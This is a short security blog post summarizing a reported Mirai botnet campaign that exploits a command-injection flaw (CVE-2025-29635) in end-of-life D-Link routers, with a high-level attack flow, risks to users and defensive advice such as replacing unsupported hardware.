New Mirai Campaign Exploits EoL D-Link Routers

April 23, 2026 Faeem BLOGS 0

Overview Akamai’s Security Intelligence Response Team (SIRT) has detected a new Mirai-based malware campaign exploiting CVE‑2025‑29635, a command-injection flaw in D-Link DIR‑823X routers. The vulnerability, first disclosed in early 2025, allows attackers to execute arbitrary commands via crafted POST requests. Although the routers reached end of life (EoL) in November 2024, attackers are now actively weaponizing the flaw to conscript devices into Mirai botnets.

Key Highlights

  • Vulnerability: CVE‑2025‑29635, command injection via /goform/set_prohibiting endpoint.
  • Impact: Remote command execution (RCE) enabling malware installation.
  • Observed Exploitation: POST requests download and execute dlink.sh, installing Mirai variant tuxnokill.
  • Capabilities: Standard Mirai DDoS attacks — TCP SYN/ACK/STOMP floods, UDP floods, HTTP null floods.
  • Cross-Vendor Exploitation: Same actor also targets TP-Link (CVE‑2023‑1389) and ZTE ZXV10 H108L routers.
  • Patch Status: No fixes expected; devices are EoL and unsupported.

Attack Flow

  1. Exploit Trigger: POST request sent to vulnerable endpoint.
  2. Payload Delivery: Attacker downloads shell script (dlink.sh) from external IP.
  3. Malware Installation: Script installs Mirai variant “tuxnokill,” supporting multiple architectures.
  4. Botnet Integration: Infected routers join Mirai botnet for DDoS campaigns.

Risks to Users

  • Botnet Recruitment: Compromised routers used in large-scale DDoS attacks.
  • Collateral Damage: Home and enterprise networks exposed to secondary compromise.
  • No Vendor Support: EoL status means no official patches will be released.
  • Cross-Device Threat: Same campaign exploits multiple router brands, expanding attack surface.

Defensive Guidance

  • Upgrade Hardware: Replace EoL routers with actively supported models.
  • Disable Remote Admin: Turn off remote management portals unless strictly necessary.
  • Change Default Credentials: Use strong, unique admin passwords.
  • Monitor Configurations: Watch for unauthorized changes or suspicious scripts.
  • Network Segmentation: Isolate IoT and router devices from critical systems.

Final Thought

This campaign highlights the long tail of risk in unsupported devices. Even years after disclosure, unpatched routers remain prime targets for botnet operators. For defenders, the lesson is clear: retire EoL hardware, enforce strong configurations, and monitor for signs of compromise to avoid becoming part of the next Mirai wave.

Be the first to comment

Leave a Reply

Your email address will not be published.


*


This site uses Akismet to reduce spam. Learn how your comment data is processed.